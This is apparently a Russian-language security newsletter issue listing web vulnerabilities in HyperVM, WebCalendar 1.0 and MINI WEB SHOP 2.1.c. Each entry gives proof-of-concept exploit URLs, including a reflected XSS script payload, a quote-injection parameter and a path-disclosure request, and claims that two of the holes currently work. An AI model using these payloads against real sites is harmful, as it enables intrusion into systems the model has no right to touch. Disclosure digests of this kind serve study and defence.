Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в HyperVM, WebCalendar, MINI


Компьютер для продвинутых пользователей
В этом выпуске:
HyperVM || WebCalendar | MINI WEB SHOP
ПО: HyperVM
Сайт: http://hypervm.com

Использование:
сайт/display.php?frm_action=%22%3E%3Cscript%3Ealert('a')%3C/script%3E
Комментарий::
Опробовать не получилось.

ПО: WebCalendar
Версия: 1.0
Сайт: http://webcalendar.sourceforge.net/
Размер: 1 Мб

Использование:
http://[сайт]/calendar/export_handler.php?format=&id=200
http://[сайт]/calendar/export_handler.php?format=&id=200

Комментарий::
Сайтов с данным продуктом мало, но уязвимсоть работаспособна на данный момент.

ПО: MINI WEB SHOP
Версия: 2.1.c
Сайт: http://ObieWebsite.SourceForge.net

Использование:
http://example.com/miniwebshop/modules/viewcategory.php?catname='>
http://example.com/miniwebshop/modules/viewcategory.php?catname=67 - раскрытие пути
Комментарий::
Уязвимсоть работаспособна на данный момент.
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru
Отблагодорить: WM - R407426923581

В избранное